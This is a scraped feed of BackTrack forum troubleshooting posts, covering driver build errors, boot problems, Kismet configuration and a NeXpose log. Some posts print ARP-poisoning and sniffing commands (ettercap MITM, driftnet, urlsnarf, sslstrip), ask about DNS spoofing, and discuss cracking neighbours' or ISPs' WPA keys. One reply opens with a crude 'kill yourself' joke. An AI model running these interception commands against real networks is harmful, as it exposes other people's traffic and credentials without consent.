/root/ipwraw-ng/ipwraw.c:3489: error: IEEE80211_52GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c: In function ipw_init_channel_map:
/root/ipwraw-ng/ipwraw.c:4111: error: IEEE80211_24GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:4112: error: IEEE80211_52GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c: In function ipw_post_alive_work:
/root/ipwraw-ng/ipwraw.c:4248: error: IEEE80211_OFDM_DEFAULT_RATES_MASK undecl
ared (first use in this function)
/root/ipwraw-ng/ipwraw.c:4249: error: IEEE80211_OFDM_BASIC_RATES_MASK undeclar
ed (first use in this function)
/root/ipwraw-ng/ipwraw.c:4250: error: IEEE80211_CCK_DEFAULT_RATES_MASK undecla
red (first use in this function)
/root/ipwraw-ng/ipwraw.c:4251: error: IEEE80211_CCK_BASIC_RATES_MASK undeclare
d (first use in this function)
/root/ipwraw-ng/ipwraw.c: In function ipw_queue_tx_free_tfd:
/root/ipwraw-ng/ipwraw.c:5974: error: implicit declaration of function ieee8021
1_get_hdrlen
/root/ipwraw-ng/ipwraw.c:5974: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c: In function raw_rx:
/root/ipwraw-ng/ipwraw.c:6396: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6406: error: ETH_P_80211_RAW undeclared (first use in
this function)
/root/ipwraw-ng/ipwraw.c: At top level:
/root/ipwraw-ng/ipwraw.c:6416: warning: struct ieee80211_rx_stats declared ins
ide parameter list
/root/ipwraw-ng/ipwraw.c:6416: warning: its scope is only this definition or dec
laration, which is probably not what you want
/root/ipwraw-ng/ipwraw.c: In function ipw_handle_data_packet:
/root/ipwraw-ng/ipwraw.c:6441: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c: At top level:
/root/ipwraw-ng/ipwraw.c:6456: warning: struct ieee80211_hdr_4addr declared in
side parameter list
/root/ipwraw-ng/ipwraw.c: In function is_duplicate_packet:
/root/ipwraw-ng/ipwraw.c:6458: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6459: error: implicit declaration of function WLAN_GET
_SEQ_SEQ
/root/ipwraw-ng/ipwraw.c:6460: error: implicit declaration of function WLAN_GET
_SEQ_FRAG
/root/ipwraw-ng/ipwraw.c: In function ipw_handle_promiscuous_tx:
/root/ipwraw-ng/ipwraw.c:6504: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6504: error: IEEE80211_FCTL_FTYPE undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:6504: error: IEEE80211_FTYPE_MGMT undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:6509: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6509: error: IEEE80211_FTYPE_CTL undeclared (first us
e in this function)
/root/ipwraw-ng/ipwraw.c:6514: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6514: error: IEEE80211_FTYPE_DATA undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:6522: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6526: error: IEEE80211_RADIOTAP_HDRLEN undeclared (fi
rst use in this function)
/root/ipwraw-ng/ipwraw.c:6540: error: IEEE80211_52GHZ_BAND undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c: At top level:
/root/ipwraw-ng/ipwraw.c:6563: warning: struct ieee80211_rx_stats declared ins
ide parameter list
/root/ipwraw-ng/ipwraw.c: In function ipw_handle_promiscuous_rx:
/root/ipwraw-ng/ipwraw.c:6618: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6618: error: IEEE80211_FCTL_FTYPE undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:6618: error: IEEE80211_FTYPE_MGMT undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:6623: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6623: error: IEEE80211_FTYPE_CTL undeclared (first us
e in this function)
/root/ipwraw-ng/ipwraw.c:6628: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c:6628: error: IEEE80211_FTYPE_DATA undeclared (first u
se in this function)
/root/ipwraw-ng/ipwraw.c:6646: error: dereferencing pointer to incomplete type
/root/ipwraw-ng/ipwraw.c: In function ipw_handle_reply_rx:
/root/ipwraw-ng/ipwraw.c:6852: error: variable stats has initializer but incom
plete type
/root/ipwraw-ng/ipwraw.c:6853: error: unknown field rssi specified in initiali
zer
/root/ipwraw-ng/ipwraw.c:6853: warning: excess elements in struct initializer
/root/ipwraw-ng/ipwraw.c:6853: warning: (near initialization for stats)
/root/ipwraw-ng/ipwraw.c:6854: error: unknown field signal specified in initia
lizer
/root/ipwraw-ng/ipwraw.c:6854: warning: excess elements in struct initializer
/root/ipwraw-ng/ipwraw.c:6854: warning: (near initialization for stats)
/root/ipwraw-ng/ipwraw.c:6855: error: unknown field noise specified in initial
izer
/root/ipwraw-ng/ipwraw.c:6855: warning: excess elements in struct initializer
/root/ipwraw-ng/ipwraw.c:6855: warning: (near initialization for stats)
/root/ipwraw-ng/ipwraw.c:6856: error: unknown field mac_time specified in init
ializer
/root/ipwraw-ng/ipwraw.c:6856: warning: excess elements in struct initializer
/root/ipwraw-ng/ipwraw.c:6856: warning: (near initialization for stats)
/root/ipwraw-ng/ipwraw.c:6857: error: unknown field rate specified in initiali
zer
-
-
21:36
»
remote-exploit & backtrack
Hey Hey, Just wanted to drop a line, or two and say hello to the community. I am new to the forums and a little new to BackTrack (but love ubuntu), so we should get along good I assume ^.^
For other n00bs reading this thread, here is a couple of quick notes on your survival of using BackTrack, or linux in general!
1. I just installed and/or booted BackTrack and I can't get connected OMG! HELP!
* Answer: Kill yourself quickly....no no, just make sure you have eth0
set to default (ifconfig eth0 default) and run dhclient, or you
can manually set the settings (man ifconfig).
* NOTE: Also, if you are using VMWare, you will have to bridge the
connection, and see vmware.com/info?id=68 for that =)
(I have also tried this on Win7, works fine!)
2. I want to hack some neighbors wireless after installing this but I don't know how, can you help me?
* Answer: In order for me, or the community to help you, you must first
help yourself, and you can best do this buy either taking the
online course, or you can read each module and google
how-to's on each module assignment (or make up your own)
* NOTE: Google is your FRIEND, and I have plenty of times come
across someone saying, I can't find I cant find, but all it really
takes is effort, and alot of -"this word" -"that word" -"this too"
tags to really hunt something down to the tee!
3. I want to be super cool like haxdash and get all the sexy ladies!
* Answer: You must first shave your head, spin around in a circle 3
complete times, hit yourself across the face, and still keep
wishing to be like me until it comes true, or you pass out
unconscious and just have a dream of being cool like me!
=p=p=p=p
Anyway, I don't want to wear out this welcome to much, you other n00bs have some homework to do, and so do I (on BT that is, im way out of school thank god)
Good luck and may the Fu be with you!
-
18:49
»
remote-exploit & backtrack
whenever i put certain commands into the konsole that use my interface wlan0 i'll get this error message :
Code:
root@bt:~# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
it just started happening in bt4, to get it to work again i have to disconnect the adapeter and reconnect it.
im assuming it's only doing this when i connect to my router by iwconfig wlan0 mode managed essid.. .... . .. ..
and when i disconnect it of course im disconnected from the router but im able to airodump-ng plus other things i couldnt.
does this message mean my adapter can't multi task or something?
-
18:37
»
remote-exploit & backtrack
I have a Inspiron 1525 laptop and the wireless card isnt working or showing up as a interface just like it didnt in bt3 either.
all i know to do is post link to drivers as well but as of right now im not able to post links.
they can be found easily at dell.com
thankyou very much, looking forward to patch!
-
15:46
»
remote-exploit & backtrack
Hello, when i type startx i get the following error:
Fatal server error: no screens found
i tryed "sudo dpkg-reconfigure xserver-xorg" but it doesnt work.
I have a notebook with an i5 M 540 and an ATI Mobile Radeon HD 5650
Its an EasyNote TJ75 notebook of Packard bell 6gb ram. My Screen-res: 1366x768
What now`?
-
14:15
»
remote-exploit & backtrack
there are drivers and says this card is supported but can not get drivers to work any body got ideas pr how tos on this? cant find any that help online or on here
-
9:46
»
remote-exploit & backtrack
ok well my first problem is i dont know how to get it to read my wifi card when i type airmon-ng stop wifi0 it says interface(eth1) chipset(unknown) driver(airo)
when i use my auditor live cd it reads my wifi card and it works ic an use kismet and things like that. but when i boot backtrack on my harddrive it wont read it.
my second thing is more of a question which is when im using my auiditor disc and i trying to send packects and capture them using airforge it says there is no buffer space to send packets or something. im sure these are pretty n00b questions but can somebody please help.
-
5:33
»
remote-exploit & backtrack
Hi Guys,
I found spoonwep2 and added it to backtrack 3, no problem, but now am desperately seeking spoonwpa2 and cannot find it anywhere.
Does anyone know where I can get the spoonwpa2.lzm file, or how I could extract it from Nubuntu, or if not, does anyone know if Nubuntu will support the RT878L Chipset?
Thanks
-
-
21:18
»
remote-exploit & backtrack
my mouse and keyboard used to work but once i downloaded/installed my wireless driver following a tutorial i found on the net i can login with the keyboard then type startx to start backtrack but when its loaded i cant move the mouse or type anything in VMware
why?? any help please?
-
21:15
»
remote-exploit & backtrack
Hi!
I was using backtrack and I installed skype.
The microphone wasnt working (the audio did work) so I installed oss.
After that , neither the audio or the microphone worked.
What shall I do?
Please help
-
15:24
»
remote-exploit & backtrack
i viewed many tutorials about dns spoofing and many videos about ettercap and how it works
i want to know how to edit the dns spoof plugin in bt4 i at videos explaining that it says that the plugin file called etter.dns
i searched this file can't be found and when i tried to check the ettercap -NG plugins already loaded they all .so and .lo not etter.dns at all
when i tried to edit the .so file or the .lo file it look weird not like the etter.dns
any help ?
-
13:04
»
remote-exploit & backtrack
hi guys,
am tired to know how can combatible d-link to work with backtrack3
and where i could find the ethros to used it .
thank you for ur help
-
8:57
»
remote-exploit & backtrack
Hello!
I'm not new to Linux or pen testing, but I am new to the Backtrack distro. A week or so ago I installed Backtrack 4 on my laptop at work, dual boot with Windows 7. The laptop is an HP Pavilion dv7. All was well until this morning, when I couldn't boot into either and was getting Grub error 22. I've tried googling and searching on these forums, but I haven't found anything specific to me.
I can boot from the live CD and mount /dev/sdb5 under /mnt.
Here is my output of fdisk -l:
# fdisk -l
Disk /dev/sda: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x485f5e16
Device Boot Start End Blocks Id System
/dev/sda1 * 1 26 203776 7 HPFS/NTFS
Partition 1 does not end on cylinder boundary.
/dev/sda2 26 58531 469939200 7 HPFS/NTFS
/dev/sda3 58531 60789 18136064 7 HPFS/NTFS
/dev/sda4 60789 60802 105496 c W95 FAT32 (LBA)
Disk /dev/sdb: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x766f69c2
Device Boot Start End Blocks Id System
/dev/sdb1 1 30401 244195008+ 7 HPFS/NTFS
/dev/sdb2 30402 60801 244188000 5 Extended
/dev/sdb5 30402 59670 235103211 83 Linux
/dev/sdb6 59671 60801 9084726 82 Linux swap / Solaris
Disk /dev/sdc: 8136 MB, 8136949760 bytes
255 heads, 63 sectors/track, 989 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x00000000
Device Boot Start End Blocks Id System
/dev/sdc1 * 1 987 7928046 6 FAT16
Any help is greatly appreciated!
-
6:52
»
remote-exploit & backtrack
Ciao ragazzi e ragazze, ho scoperto questo forum grazie al blog italiano di backtrack :).
Mi chiamo Enrico ho 22 anni e studio scienze e tecnologie informatiche, che come quasi tutti i nomi pomposi, serve più che altro a riempirsi la bocca.
La verità è che in questa uni ci insegnano cose molto interessanti (sopratutto programmazione generale, e quasi tutta in java) ma ne tralasciano alcune, sotto ogni punto di vista. tra di queste, la sicurezza informatica. Ed è per questo motivo che mi sono trovato in questo forum. Perchè cerco una comunità o cmq qualcuno che mi dia i LA per capirci qualcosa :D:D
Quindi, se non l'avete capito, vi sto chiedendo aiuto!!! Anche perchè io ho veramente scarsissime conoscenze informatiche e generali. Spero che grazie a voi e con voi possa ampliare i miei confini :).
GRazie a tutti!
-
6:30
»
remote-exploit & backtrack
hi ive got an Asus K52F laptop with an Atheros AR9285 Wireless Network Adapter ive searched around and i think my wireless card is compatible with backtrack
but my problem isnt that my problem is that i can surf the web on backtrack but when i type airmon-ng no interface comes up i dont know what to do to get an interface running
when i type iwconfig it says "no wireless extensions" on both interfaces
any help thanks?
-
6:19
»
remote-exploit & backtrack
Salve a tutti la discussione che sto aprendo e' solo a livello di curiosita.
Vorrei sapere se mai qualcuno e' riuscito a cracckare la wpa di alice(24 caratteri) o quella di fastweb(10 caratteri).Io mi sono arreso,almeno riguardo la wpa di alice,perche' penso che sia impossibile indovinarla con un dizionario casuale o un brute force con crunch.forse la strada migliore e' quella della retroingegnerizzazione.....arte alquanto difficile da intraprendere.Ci sarebbe solo un tizio di nome saxdax che e' riuscito,a detta di altri, a risalire tramite l' ssid della rete alla wpa standard del router di alice.Riguardo a quella di fastweb l'impresa con l'aiuto di pyrit potrebbe essere fattibile.
Voi cosa ne pensate?
-
4:00
»
remote-exploit & backtrack
hi!
i've using backtrack 4 on VMware. When I use the self-installed wlassistant i can see the wifi networks on my neighbourhoods, but if I've using in the kernel the airodump, than i can NOT see any usefull networks detalis, i see nothing.
Please help me, what may be the problem. Thanks guys.
-
0:58
»
remote-exploit & backtrack
Hi guys,
I've slackware 64 bit installed in partition sda1.
The BT4's installation is in sda3.
Now, if I install GRUB from BT4, I can boot BT4 without problem... but I can't boot Slackware (I can see it, but if I start nothing happens).
Same with Slackware, after installing LILO and added BT4 I can boot slackware but not backtrack (this time, I start BT and it hangs on USB devices, I have nothing attacched and it seems like it stops at the card reader).
I've acer aspire 5735z
I used BT for a long time without problem, this is the first time that I dual - boot.
Hope you can help!
Thanks
-
-
23:03
»
remote-exploit & backtrack
I tried every possible way I can to get this graphic card work on BT 4 but no luck. Please help!
-
19:44
»
remote-exploit & backtrack
Could anyone send me Nessus version 3.2.1 for linux(bt4) if they have it or a link somewhere to download it? The web based version is very glitchy in my opinion and prefer the old software version that you could install, but have been looking on the web and have not been able to find a place to download it.
-
19:42
»
remote-exploit & backtrack
when i enter the command
Code:
root@bt:/pentest/spoofing/sslstrip# python ./sslstrip.py -a -l 8080
I receive the error message
Code:
root@bt:/pentest/spoofing/sslstrip# python ./sslstrip.py -a -l 8080
Traceback (most recent call last):
File "./sslstrip.py", line 254, in <module>
main(sys.argv[1:])
File "./sslstrip.py", line 246, in main
server = ThreadingHTTPServer(('', listenPort), StripProxy)
File "/usr/lib/python2.5/SocketServer.py", line 330, in __init__
self.server_bind()
File "/usr/lib/python2.5/BaseHTTPServer.py", line 101, in server_bind
SocketServer.TCPServer.server_bind(self)
File "/usr/lib/python2.5/SocketServer.py", line 341, in server_bind
self.socket.bind(self.server_address)
File "<string>", line 1, in bind
TypeError: an integer is required
Yes, I am root. Yes, I have ipforwarding and arpspoof enabled correctly, i'm not sure what else it could be.
-
15:19
»
remote-exploit & backtrack
I recently installed BackTrack 4 on my macbook pro. While the installation for backtrack completed successfully, the mac side had an error. When partitioning the hard drive, I made the BackTrack 4 the root and left the mac side of the hard drive to the default that it had been set at. After installing BackTrack the mac side of the computer was not seen. When looking at the partition in BackTrack I saw that the mac side was not recognizable. I do not think the partition was wiped clean, but at the same time, I have no idea how to get it back and running. Any help is greatly appreciated!
-
11:48
»
remote-exploit & backtrack
hello guys i got a problem with gerix the first time i used it
it worked perfectly but then when i booted it again every time i open gerix
then i enable the interface and when i click to search for wifi networks it stucks
any idea????????
-
11:44
»
remote-exploit & backtrack
i type xrandr to see resolutions and it sais minimum 640x480 and max 800x600 but my monitor supports up to 1280x1024 and when i type xrandr -s 1280x1024 it says it cant find it on supported modes.
how to i change it above 800x600??
-
9:24
»
remote-exploit & backtrack
in bt3 it used to work fine but now im having some problems with them.
i have 3 scripts i just plug in when i want to network sniff
its:
Code:
ettercap -T -q -p -M ARP // //
Code:
driftnet -a -d /root/pics -s -p -i wlan0
Code:
urlsnarf -i wlan0
ettercap doesnt even want to start. it will say listening on eth0 for some reason and then this stuff and then FATAL: MITM attacks can't be used on unconfigured interfaces.
as for driftnet and urlsnarf, they dont even sniff the network! they only grab pictures and urls from the pages i visit on that computer.
is there something wrong here? something i need to install or what?
thanks for replies.
-
4:30
»
remote-exploit & backtrack
hi gyhs i am a new member here so hallo.
i have a problem.
i install the bt4 via vmware 7.
i login with no problem.
i have internet via bt4.
but when i do the command iwconfig say no "lo no wireless connections"
"eth0 no wireless connections".
When i try/etc/init.d/networking start
it say "failed to bring up wlan0"
what i can do? i have a tp link TL-WN821n usb wifi adapter on my desktop.
thanks and i am waiting for your response .
thanks you again.
-
-
22:35
»
remote-exploit & backtrack
Does anybody know what chipset a microsoft brand wireless notebook adapter MN-520 has? i read that it should work with backtrack but idk for sure and i need to know if i should just buy a better one?
-
-
10:42
»
remote-exploit & backtrack
Hello guys
1)a.-The kismet newcore preinstalled in my backtrack 4 final release doesnt have the file kismet_ui.conf in nowhere :eek:.
I looked this file whit
Code:
#locate kismet_ui.conf
/pentest/wireless/kismet-newcore/kismet-devel/man/kismet_ui.conf.5
/pentest/wireless/kismet-newcore/kismet-devel/man/.svn/text-base/kismet_ui.conf.5.svn-base
/pentest/wireless/kismet-newcore/man/kismet_ui.conf.5
/pentest/wireless/kismet-newcore/man/.svn/text-base/kismet_ui.conf.5.svn-base
but "kismet_ui.conf.5" and "kismet_ui.conf.5.svn-base" are just help files.
b.-also i looked that file in
Code:
/usr/etc
and
/usr/local/etc
whith no results
2) I have noticed that after close the kismet, a file its created in the path
~# .kismet/kismet_ui.conf
After edit that file nothing happens therefore i think that file is one that use kismet just to show info about the configuration of windows panels. But not the realy kismet_ui.conf file.
3) a.-Thats wath i get when use ./configure
Code:
root@bt:/pentest/wireless/kismet-newcore# ./configure
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for g++... g++
checking whether we are using the GNU C++ compiler... yes
checking whether g++ accepts -g... yes
checking for a BSD-compatible install... /usr/bin/install -c
checking whether make sets $(MAKE)... yes
checking how to run the C preprocessor... gcc -E
checking for platform-specific compiler flags... none needed
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking whether byte ordering is bigendian... no
checking errno.h usability... yes
checking errno.h presence... yes
checking for errno.h... yes
checking for stdlib.h... (cached) yes
checking for string.h... (cached) yes
checking sys/socket.h usability... yes
checking sys/socket.h presence... yes
checking for sys/socket.h... yes
checking sys/time.h usability... yes
checking sys/time.h presence... yes
checking for sys/time.h... yes
checking sys/wait.h usability... yes
checking sys/wait.h presence... yes
checking for sys/wait.h... yes
checking for unistd.h... (cached) yes
checking for sys/types.h... (cached) yes
checking netdb.h usability... yes
checking netdb.h presence... yes
checking for netdb.h... yes
checking getopt.h usability... yes
checking getopt.h presence... yes
checking for getopt.h... yes
checking for an ANSI C-conforming const... yes
checking whether time.h and sys/time.h may both be included... yes
checking whether struct tm is in sys/time.h or time.h... time.h
checking for ANSI C header files... (cached) yes
checking return type of signal handlers... void
checking whether lstat dereferences a symlink specified with a trailing slash...
yes
checking whether stat accepts an empty string... no
checking for gettimeofday... yes
checking for memset... yes
checking for select... yes
checking for socket... yes
checking for strcasecmp... yes
checking for strftime... yes
checking for strstr... yes
checking for system-level getopt_long()... yes
checking for stdint.h... (cached) yes
checking for accept() addrlen type... socklen_t
checking for special C compiler options needed for large files... no
checking for _FILE_OFFSET_BITS value needed for large files... 64
checking for dlopen in -ldl... yes
checking for libm math function in std libs... no
checking for pow in -lm... yes
checking for main in -luClibc++... no
checking for main in -lstdc++... yes
checking for group 'root'... yes
checking for group 'man'... checking for initscr in -lncurses... yes
checking ncurses.h usability... yes
checking ncurses.h presence... yes
checking for ncurses.h... yes
checking for new_panel in -lpanel... yes
checking panel.h usability... yes
checking panel.h presence... yes
checking for panel.h... yes
checking for setproctitle... no
checking libutil.h usability... no
checking libutil.h presence... no
checking for libutil.h... no
checking for setproctitle in -lutil... no
checking sys/pstat.h usability... no
checking sys/pstat.h presence... no
checking for sys/pstat.h... no
checking whether __progname and __progname_full are available... yes
checking which argv replacement method to use... writeable
checking for linux/wireless.h... yes
checking that linux/wireless.h is what we expect... yes
checking can we use iw_freq.flags... yes
checking for cap_init in -lcap... no
checking sys/prctl.h usability... yes
checking sys/prctl.h presence... yes
checking for sys/prctl.h... yes
checking sys/capability.h usability... no
checking sys/capability.h presence... no
checking for sys/capability.h... no
checking for pcre_compile in -lpcre... no
configure: WARNING: Failed to find libpcre
checking for pcap_open_live in -lpcap... yes
checking pcap.h usability... yes
checking pcap.h presence... yes
checking for pcap.h... yes
checking for pcap_setnonblock in -lpcap... yes
checking for pcap_get_selectable_fd in -lpcap... yes
checking for PPI support in libpcap... yes
configure: WARNING: Using local radiotap headers
checking asm/types.h usability... yes
checking asm/types.h presence... yes
checking for asm/types.h... yes
checking netlink/genl/genl.h usability... yes
checking netlink/genl/genl.h presence... yes
checking for netlink/genl/genl.h... yes
checking netlink/genl/family.h usability... yes
checking netlink/genl/family.h presence... yes
checking for netlink/genl/family.h... yes
checking netlink/genl/ctrl.h usability... yes
checking netlink/genl/ctrl.h presence... yes
checking for netlink/genl/ctrl.h... yes
checking netlink/msg.h usability... yes
checking netlink/msg.h presence... yes
checking for netlink/msg.h... yes
checking netlink/attr.h usability... yes
checking netlink/attr.h presence... yes
checking for netlink/attr.h... yes
checking linux/nl80211.h usability... yes
checking linux/nl80211.h presence... yes
checking for linux/nl80211.h... yes
checking linux/if_arp.h usability... no
checking linux/if_arp.h presence... yes
configure: WARNING: linux/if_arp.h: present but cannot be compiled
configure: WARNING: linux/if_arp.h: check for missing prerequisite headers?
configure: WARNING: linux/if_arp.h: see the Autoconf documentation
configure: WARNING: linux/if_arp.h: section "Present But Cannot Be Compiled"
configure: WARNING: linux/if_arp.h: proceeding with the preprocessor's result
configure: WARNING: linux/if_arp.h: in the future, the compiler will take precedence
checking for linux/if_arp.h... yes
checking for linux/wireless.h... (cached) yes
checking for pkg-config... /usr/bin/pkg-config
checking pkg-config is at least version 0.9.0... yes
checking for libnl20... no
checking for libnl1... yes
checking For mac80211 support in netlink library... yes
configure: creating ./config.status
config.status: creating Makefile
config.status: WARNING: 'Makefile.in' seems to ignore the --datarootdir setting
config.status: creating scripts/kismet
config.status: creating extra/buzzme/Makefile
config.status: WARNING: 'extra/buzzme/Makefile.in' seems to ignore the --datarootdir setting
config.status: creating extra/Makefile
config.status: WARNING: 'extra/Makefile.in' seems to ignore the --datarootdir setting
config.status: creating conf/kismet.conf
config.status: creating config.h
config.status: config.h is unchanged
Configuration complete:
Compiling for: linux-gnu (i686)
C++ Library: stdc++
Installing as group: root
Man pages owned by: man
Installing into: /usr/local
Setuid group: kismet
Terminal Control: ncurses
Linux WEXT capture : yes
OSX/Darwin capture : n/a (only OSX/Darwin)
PCRE Regex Filters : no
pcap capture: yes
airpcap control: n/a (only Cygwin/Win32)
PPI log format: yes
Capability Dropping: no
Linux Netlink: yes (mac80211 VAP creation)
Configuration complete. Run 'make dep' to generate dependencies
and 'make' followed by 'make install' to compile and install.
b.-i also used ./configure in the path /pentest/wireless/kismet-newcore/kismet-devel/
and whit the last kismet stable release and kismet devel from the official page of kismet
c.- i noticed that the file kismet_ui.conf is not in the output of ./configure. At this point i think the problem is abouth missing files.
4)Finally the question is how can i solve this problem any suggestion?
i need edit that file to configure the panels and other advance features in kismet. Thanks for your time.
-
10:06
»
remote-exploit & backtrack
Hi bt users
I am doing an experiment in which i am trying to get an energy saving protocol in 802.11 MAC layer
i am using orinocco cards in ad-hoc mode and 2 computers with ubuntu 8.10
i am planning to switch over to bt4 as i need to dump the packets and then analyse them for throughput etc..
i am using tcpdump/wireshark for this
next stage i am going to fix the power of both the cards and vary the distances and analyse the loss in packets..
can someone recommend me utilities specifically in bt4
lastly i am planning to make one node as master and inject the protocol using some utility..please recommend me utilities to achieve my experiment..
thanx in advance
-
10:01
»
remote-exploit & backtrack
Hi bt people
When i was on bt3 and i upgraded my kernel i had some serious problems pertaining to the usage..the system had gone highly unstable and it took me at least 20 days to stabilise it
So before i attempt upgrades on bt4 i want to seek your advice/experiences
-
-
6:11
»
remote-exploit & backtrack
hi all ,
bt 4 final nexpose not working ..pls help me????
root@bt:/opt/rapid7/nexpose/nsc# ./nsc.sh
Checking for available jvms
Validating jre in directory _jvm
OS information
------------------------------------------------------------
Current directory: /opt/rapid7/nexpose/nsc
User name: root
Computer name: bt
Operating system: Ubuntu Linux 8.10
Total memory: 250640 KBytes
Available memory: 4044 KBytes
CPU speed: 2333MHz
Number of CPUs: 1
Super user: true
JVM started: Fri Mar 19 07:28:20 EDT 2010
JVM uptime: 2 seconds
Checking graphics environment...
OK
WARNING: Minimum memory requirement has not been met. Only 244MB is installed.
PATH: /opt/kde3/bin:/opt/kde3/games:/usr/local/sbin:/usr/local/bin:/usr/sbin:/us
r/bin:/sbin:/bin:/usr/games:/opt/oracle/instantclient_10_2:/opt/oracle/instantcl
ient_10_2
The Java virtual machine is exiting with code 0
Using jre at _jvm
WARNING: Minimum memory requirement has not been met. Only 244MB is installed.
PATH: /opt/kde3/bin:/opt/kde3/games:/usr/local/sbin:/usr/local/bin:/usr/sbin:/us
r/bin:/sbin:/bin:/usr/games:/opt/oracle/instantclient_10_2:/opt/oracle/instantcl
ient_10_2
Logging to file /opt/rapid7/nexpose/update.log
Checking for available jvms
Validating jre in directory _jvm
OS information
------------------------------------------------------------
Current directory: /opt/rapid7/nexpose/nsc
User name: root
Computer name: bt
Operating system: Ubuntu Linux 8.10
Total memory: 250640 KBytes
Available memory: 5720 KBytes
CPU speed: 2333MHz
Number of CPUs: 1
Super user: true
JVM started: Fri Mar 19 07:28:24 EDT 2010
JVM uptime: 1 second
Checking graphics environment...
OK
WARNING: Minimum memory requirement has not been met. Only 244MB is installed.
PATH: /opt/kde3/bin:/opt/kde3/games:/usr/local/sbin:/usr/local/bin:/usr/sbin:/us
r/bin:/sbin:/bin:/usr/games:/opt/oracle/instantclient_10_2:/opt/oracle/instantcl
ient_10_2
The Java virtual machine is exiting with code 0
Using jre at _jvm
WARNING: Minimum memory requirement has not been met. Only 244MB is installed.
PATH: /opt/kde3/bin:/opt/kde3/games:/usr/local/sbin:/usr/local/bin:/usr/sbin:/us
r/bin:/sbin:/bin:/usr/games:/opt/oracle/instantclient_10_2:/opt/oracle/instantcl
ient_10_2
NSC 3/19/10 7:28 AM: Logging initialized (system time zone is America/Ne
w_York)
NSC 3/19/10 7:28 AM: initializing JDBC drivers
NSC 3/19/10 7:28 AM: NeXpose is running interactively under super-user:
root
NSC 3/19/10 7:28 AM: WARNING: NeXpose running with insufficient free mem
ory: 244MB total (3MB free)
NSC 3/19/10 7:28 AM: System speed: 2333MHz (x1)
Server 3/19/10 7:28 AM: Using license: r7lic23664.lic, expires: Tuesday, Fe
bruary 2, 2100 12:00:00 AM GMT (r7lic23664.lic)
NSC 3/19/10 7:28 AM: Custom SSL certificate not available. Using default
NSC certificate for web server.
httpd 3/19/10 7:28 AM: configuring web server...
Api12Context3/19/10 7:28 AM: Searching for JAXB context classes
httpd 3/19/10 7:28 AM: registering shutdown hook...
httpd 3/19/10 7:28 AM: Generating skin: /opt/rapid7/nexpose/nsc/htroot/scr ipts/nexpose-skin.js
httpd 3/19/10 7:28 AM: Generating feature set: /opt/rapid7/nexpose/nsc/htr oot/scripts/nexpose-features.js
DaemonMgr 3/19/10 7:28 AM: Starting WebServer
httpd 3/19/10 7:28 AM: bringing up SSL and initializing components...
NSC 3/19/10 7:28 AM: Web server subsystem initialized
Scheduler 3/19/10 7:28 AM: initializing...
DaemonMgr 3/19/10 7:28 AM: Starting NexposeScheduler
NSC 3/19/10 7:28 AM: Scheduler subsystem initialized
NSC 3/19/10 7:28 AM: Initializing administrative alerters
NSC 3/19/10 7:28 AM: initializing log rotation
NSC 3/19/10 7:28 AM: Cleaning up temporary NeXpose files
NSC 3/19/10 7:28 AM: Initializing update engine
AU-88E704D253/19/10 7:28 AM: initializing update engine for 88E704D255EFD627455B D18D30A6EBA28ACF54B1...
httpd 3/19/10 7:28 AM: NSC/0.6.4 (JVM) bound to port 3780 and running...
AU-88E704D253/19/10 7:28 AM: Checking for approved updates...
AU-88E704D253/19/10 7:28 AM: No approved updates found for processing
AU-88E704D253/19/10 7:28 AM: Started auto-update...
AU-88E704D253/19/10 7:28 AM: Establishing HTTP connection with updates.rapid7.co m via proxy (updates.rapid7.com:80)...
AU-88E704D253/19/10 7:28 AM: Encountered an error closing update server connection: updates.rapid7.com
NSC 3/19/10 7:28 AM: Failed to auto-update console: updates.rapid7.com
NSC 3/19/10 7:28 AM: Initializing postgresql database manager for //127.0.0.1:5432/nexpose...
postgresql 3/19/10 7:28 AM: Starting up postgresql DB system
postgresql 3/19/10 7:28 AM: Nexpose PostgreSQL service status: 0
postgresql 3/19/10 7:28 AM: Removed spurious postmaster.pid file
